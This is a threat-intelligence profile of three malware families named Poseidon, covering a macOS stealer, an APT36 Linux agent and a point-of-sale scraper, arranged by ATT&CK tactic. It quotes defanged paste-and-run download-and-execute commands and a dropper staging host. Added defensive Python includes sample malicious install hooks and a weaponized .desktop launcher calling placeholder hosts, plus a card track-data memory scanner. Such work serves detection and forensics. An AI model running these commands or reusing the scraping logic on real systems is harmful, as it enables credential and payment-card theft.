Poseidon
Poseidon is a name shared by several unrelated malware families. Most prominently, it refers to a macOS infostealer, a fork of AMOS (Atomic macOS Stealer), that steals browser cookies, saved passwords, cryptocurrency wallet credentials, and other user data. Reported capabilities include theft from more than 160 cryptocurrency wallets, web browsers, the Bitwarden and KeePassXC password managers, FileZilla, and VPN configurations including Fortinet and OpenVPN. It has been distributed through malvertising and malicious ads, fake download sites pushed high in search results, free or cracked software, and AppleScript-generated fake prompts that mimic native macOS dialogs to capture the user's password. Public reporting describes Poseidon as the most active infostealer on Mac in late 2024, accounting for 70% of macOS infostealer detections, with Odyssey later emerging as its successor.
The name Poseidon is also used for the Linux agent of the Mythic C2 framework. In that context it is a Go-based backdoor used by Transparent Tribe (APT36) in campaigns against Indian government and defense-related entities, including systems running BOSS Linux. Reported capabilities include data collection, long-term access, credential harvesting, file operations, and lateral movement. Related reporting places Poseidon at the start of APT36's Linux malware progression, before AresRAT and DeskRAT. Separate supply-chain reporting states that malicious npm packages such as eslint-verify-plugin dropped a Poseidon Mythic agent on Linux hosts.
A third, distinct family is PoSeidon, point-of-sale malware that targeted PoS terminals at restaurants, bars, and hotels in the U.S. It scrapes process memory for payment card track data and includes a keylogger to capture usernames and passwords. This page indexes all three under the display form "Poseidon"; because the name is overloaded across unrelated families, confirm which one a given report means before acting on its IOCs or detections.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Tied together with six months of passive DNS, Poseidon heads the sequence of Linux-oriented RAT families APT36 has rotated through since mid-2024 (Poseidon → AresRAT → DeskRAT), alongside the parallel Windows CrimsonRAT track.
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
"Cybersecurity researchers have discovered four malicious NuGet packages... designed to target ASP.NET web application developers..." and "a malicious npm package named ambar-src..."
The current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks — a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
...decoy PDF hosted on Google Drive...; users are redirected to these URLs through spear-phishing emails.
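The NuGet and npm packages quoted above gain execution through the package manager itself, most often via lifecycle scripts that run at install time before the consuming project ever imports the package. The Python below is an added example (not code from the page, from Mallory, or from any vendor): it triages a package.json for install hooks whose commands fetch and run remote code. The two manifests, the package names and the heuristics are constructed for illustration.

```python
"""Triage npm package manifests for install-time code execution.

Added example, not from the page or any vendor. Flags package.json
lifecycle hooks that npm runs during `npm install` and whose command
looks like a dropper (network fetch, inline eval, encoded payload,
pipe to shell, staging in a temp dir). Manifests below are constructed.
"""
import json
import re

# Hooks npm executes automatically at install time. `prepare` runs for
# local and git installs; the others run for registry installs too.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics for dropper-like commands in a hook.
SUSPICIOUS = {
    "network_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    "inline_eval": re.compile(r"\bnode\s+-e\b|\beval\s*\(", re.I),
    "encoded_blob": re.compile(r"\bbase64\b|\\x[0-9a-f]{2}", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b", re.I),
    "temp_drop": re.compile(r"/tmp/|%TEMP%|\$TMPDIR", re.I),
}

def triage_manifest(manifest_json: str) -> dict:
    """Return {hook: [reasons]} for each install hook that looks dropper-like."""
    pkg = json.loads(manifest_json)
    scripts = pkg.get("scripts", {})
    findings = {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if reasons:
            findings[hook] = reasons
    return findings

# Constructed manifests: one that only compiles TypeScript on prepare, one
# that fetches and runs a remote script the moment it is installed.
BENIGN = json.dumps({
    "name": "tidy-util", "version": "1.0.0",
    "scripts": {"prepare": "tsc -p .", "test": "node test.js"},
})
MALICIOUS = json.dumps({
    "name": "example-lint-plugin", "version": "9.9.9",
    "scripts": {"postinstall": "curl -s hxxps://example.invalid/a | bash",
                "test": "echo ok"},
})

if __name__ == "__main__":
    for manifest in (BENIGN, MALICIOUS):
        print(json.loads(manifest)["name"], triage_manifest(manifest))
```

Run it against every package.json under node_modules after an install (or, better, against the tarball before installing) to surface hooks that deserve a read; `npm install --ignore-scripts` blocks the hooks outright while you review them.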
Execution
4 techniques
The malware also establishes persistence by means of a cron job that executes the main payload automatically after a system reboot or process termination.
"Infostealers like Poseidon are abusing the AppleScript framework... to simulate prompts that mimic native Apple prompts, with the goal of stealing end user credentials."
The command that’s copied for macOS devices instructs the system to... curl -o /tmp/update hxxps[:]//applemacios[.]com/getrur/update ... chmod +x /tmp/update ... Run the downloaded file /tmp/update.
weaponized .desktop shortcut files that, once opened, download and execute malicious payloads.
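The three execution artifacts quoted in this section (an AppleScript password dialog, a copy-and-paste curl/chmod/run chain into /tmp, and a weaponized .desktop launcher) leave recognisable shapes in process and file telemetry. The Python below is an added example, not code from the page or from any vendor: it runs two command-line rules and one .desktop parser over constructed records. The telemetry field name `cmdline`, the sample launcher contents and the reuse of the defanged command quoted above are assumptions made for the example.

```python
"""Flag the execution artifacts quoted in this section in process and file telemetry.

Added example, not code from the page or from any vendor. Three checks over
constructed inputs:
  1. osascript drawing a password dialog (AppleScript fake credential prompt)
  2. a curl/wget -> chmod +x -> run-from-/tmp chain (paste-and-run lure)
  3. a .desktop launcher whose Exec= line downloads and executes a payload
The telemetry field name `cmdline` is an assumption about the schema.
"""
import re
from configparser import ConfigParser

RULES = {
    # `display dialog ... default answer "" with hidden answer` is how an
    # AppleScript draws a password field that looks like a system prompt.
    "applescript_password_prompt": re.compile(
        r"osascript.*display dialog.*with hidden answer", re.I | re.S),
    # Fetch into a world-writable dir, mark executable, reference it again
    # (execution): the shape of the copied macOS command quoted above.
    "tmp_download_chmod_exec": re.compile(
        r"(curl|wget)[^;&|]*\s(/tmp/\S+|\$TMPDIR/\S+)"
        r".*chmod\s+\+x\s+\S+"
        r".*(/tmp/|\$TMPDIR/)",
        re.I | re.S),
}

def flag_cmdline(cmdline: str) -> list:
    """Return the names of the rules one process command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

# Exec= line that fetches something and runs it (pipe to shell, chmod +x, /tmp path).
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*(\|\s*(ba)?sh\b|chmod\s+\+x|/tmp/)", re.I | re.S)

def flag_desktop_file(text: str) -> list:
    """Return reasons a .desktop launcher looks weaponized; [] if nothing stands out."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return []
    entry = cp["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    reasons = []
    if DOWNLOAD_EXEC.search(exec_line):
        reasons.append("exec_downloads_and_runs")
    # A shell wrapper with Terminal=false runs with no visible window.
    if entry.get("Terminal", "").lower() == "false" and re.search(r"\b(ba)?sh\s+-c\b", exec_line):
        reasons.append("hidden_shell_wrapper")
    # Launchers named like documents are the decoy the lure reporting describes.
    if re.search(r"\.(pdf|docx?|xlsx?)\b", entry.get("Name", ""), re.I):
        reasons.append("document_lookalike_name")
    return reasons

# Constructed process records. The second reuses the defanged command quoted above.
EVENTS = [
    {"host": "mac-01", "cmdline": "osascript -e 'display dialog \"macOS needs your password to continue.\" "
                                  "default answer \"\" with hidden answer with icon caution'"},
    {"host": "mac-02", "cmdline": "curl -o /tmp/update hxxps://applemacios[.]com/getrur/update "
                                  "&& chmod +x /tmp/update && /tmp/update"},
    {"host": "mac-03", "cmdline": "curl -o /Users/dev/pkg.tgz https://registry.example.invalid/pkg.tgz"},
]

# Constructed launcher files: one weaponized, one ordinary editor shortcut.
MALICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Procurement_Notice.pdf
Exec=bash -c "curl -s hxxps://example.invalid/d -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x"
Icon=application-pdf
Terminal=false
"""
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Terminal=false
"""

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["host"], flag_cmdline(ev["cmdline"]))
    print("malicious.desktop", flag_desktop_file(MALICIOUS_DESKTOP))
    print("benign.desktop", flag_desktop_file(BENIGN_DESKTOP))
```

The command-line rules are deliberately shape-based rather than IOC-based: the staging domain will change between campaigns, but a paste-and-run lure still has to download, chmod and execute from somewhere the user can write.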
Persistence
1 technique
Privilege Escalation
1 technique
Stealth
2 techniques
The current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks, a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
Credential Access
3 techniques
Point-of-Sale (PoS) terminals have become an attractive target for hackers over the past year, reflected in the increasing number of RAM-scraping programs that steal payment card information from the memory of such systems.
The malicious code embedded into the packages comes with capabilities to siphon system information, access tokens, environment secrets, and API keys from developer environments... It also harvests API keys for nine large language models (LLM) providers.
The entire attack chain unfolds over two stages: a first-stage component that captures credentials and cryptocurrency keys and then loads a secondary stage that subsequently performs deeper harvesting of credentials from password managers.
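For the PoS family quoted first in this section, "RAM scraping" means searching process memory for magnetic-stripe track data and keeping only card numbers that pass the Luhn check. The Python below is an added example, not the malware's code or any vendor's: it runs that search over a constructed memory buffer, which is also how a forensic examiner checks a memory dump for exposed card data. The buffer contents and the test PAN 4111 1111 1111 1111 are constructed; the track layouts follow ISO/IEC 7813.

```python
"""Scan a memory buffer for magnetic-stripe track data.

Added example, not from the page or any vendor. This is the search a PoS
RAM scraper performs, and equally the check a responder runs over a memory
dump to see what a scraper could have taken. Buffer and PAN are constructed.
"""
import re

# Track 2 (ISO/IEC 7813): ;<PAN>=<YYMM><service code><discretionary>?
TRACK2 = re.compile(rb";(?P<pan>\d{13,19})=(?P<exp>\d{4})[^?]*\?")
# Track 1 format B: %B<PAN>^<NAME>^<YYMM><service code><discretionary>?
TRACK1 = re.compile(rb"%B(?P<pan>\d{13,19})\^(?P<name>[^^]{2,26})\^(?P<exp>\d{4})[^?]*\?")

def luhn_ok(pan: bytes) -> bool:
    """Luhn mod-10 check; scrapers use it to discard digit runs that are not cards."""
    digits = [int(c) for c in pan.decode()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def scrape_tracks(buf: bytes) -> list:
    """Return (track_type, masked_pan, expiry) for every Luhn-valid track in buf."""
    hits = []
    for kind, rx in (("track1", TRACK1), ("track2", TRACK2)):
        for m in rx.finditer(buf):
            pan = m.group("pan")
            if not luhn_ok(pan):
                continue
            # Keep BIN and last four only; a scanner should never log the full PAN.
            masked = pan[:6].decode() + "*" * (len(pan) - 10) + pan[-4:].decode()
            hits.append((kind, masked, m.group("exp").decode()))
    return hits

# Constructed memory image: ordinary PoS process data with one swipe embedded,
# plus a track-shaped digit run that fails Luhn and must be ignored.
SAMPLE_MEMORY = (
    b"\x00\x00order=1842;table=7\x00"
    b"%B4111111111111111^DOE/JANE^25121010000000000?"
    b"\x00\x00;4111111111111111=25121010000012345678?\x00"
    b";1234567890123456=2512101?\x00"
    b"total=42.10\x00"
)

if __name__ == "__main__":
    for hit in scrape_tracks(SAMPLE_MEMORY):
        print(*hit)
```

On a real PoS host the buffer would come from reading another process's memory (for instance /proc/PID/mem or ReadProcessMemory), which is exactly the cross-process read an EDR should be alerting on for a payment application.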
Discovery
2 techniques
Command and Control
1 technique
The shell script serves as a dropper to fetch a hex-encoded file from an attacker-controlled server ("securestore[.]cv") and save it to disk as an ELF binary...
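The dropper quoted above fetches a hex-encoded file and writes the decoded bytes to disk as an ELF binary. A responder who recovers that blob from a proxy log or a capture can decode and triage it offline without touching the staging server; the Python below is an added example (not from the page, the dropper, or any vendor) that does so. The hex blob is a constructed 64-byte ELF header built inside the script, not a real sample.

```python
"""Decode a hex-encoded payload the way the dropper does, then triage it as ELF.

Added example, not from the page or any vendor. The blob is a constructed
ELF64 header generated below, so the script runs offline and contacts nothing.
"""
import binascii
import struct

E_MACHINE = {0x03: "x86", 0x3E: "x86-64", 0x28: "ARM", 0xB7: "AArch64"}
E_TYPE = {2: "EXEC", 3: "DYN (PIE or shared object)"}

def decode_hex_blob(blob: bytes) -> bytes:
    """Strip whitespace/line wrapping and hex-decode, as the shell dropper does before writing to disk."""
    return binascii.unhexlify(b"".join(blob.split()))

def triage_elf(data: bytes) -> dict:
    """Return basic ELF header facts, or {'is_elf': False} for anything else."""
    if len(data) < 0x40 or data[:4] != b"\x7fELF":
        return {"is_elf": False}
    ei_class = data[4]                       # 1 = 32-bit, 2 = 64-bit
    ei_data = data[5]                        # 1 = little-endian, 2 = big-endian
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", data[0x10:0x14])
    return {
        "is_elf": True,
        "bits": 64 if ei_class == 2 else 32,
        "endian": "little" if ei_data == 1 else "big",
        "type": E_TYPE.get(e_type, f"0x{e_type:x}"),
        "machine": E_MACHINE.get(e_machine, f"0x{e_machine:x}"),
    }

def _build_header() -> bytes:
    """Constructed ELF64 little-endian x86-64 EXEC header with empty program/section tables."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # e_ident: class, data, version, OS ABI, pad
    rest = struct.pack(
        "<HHIQQQIHHHHHH",
        2, 0x3E, 1,                 # e_type=EXEC, e_machine=x86-64, e_version
        0x401000, 0x40, 0,          # e_entry, e_phoff, e_shoff
        0, 0x40, 0x38, 0,           # e_flags, e_ehsize, e_phentsize, e_phnum
        0x40, 0, 0,                 # e_shentsize, e_shnum, e_shstrndx
    )
    return ident + rest

# The "hex-encoded file" as the dropper would fetch it, wrapped at 32 hex chars per line.
_hex = binascii.hexlify(_build_header())
HEX_BLOB = b"\n".join(_hex[i:i + 32] for i in range(0, len(_hex), 32))

if __name__ == "__main__":
    raw = decode_hex_blob(HEX_BLOB)
    print(len(raw), "bytes decoded:", triage_elf(raw))
```

Hex encoding is not obfuscation, but it does defeat naive content inspection that looks for the `\x7fELF` magic on the wire; decoding at the proxy or in the sandbox before applying file-type rules closes that gap.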
Exfiltration
1 technique
These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.
IOCs tracked for this family
9 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
15 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Linux ELF RAT family previously used by APT36 as part of its Linux implant evolution before AresRAT and DeskRAT.
A stealer named in source reporting as another macOS stealer in the same ecosystem.
Mythic C2 agent referenced as being dropped by a rogue npm package (eslint-verify-plugin) on Linux/macOS systems.
Linux agent for the Mythic C2 framework used for post-exploitation, including file operations, credential harvesting, and lateral movement.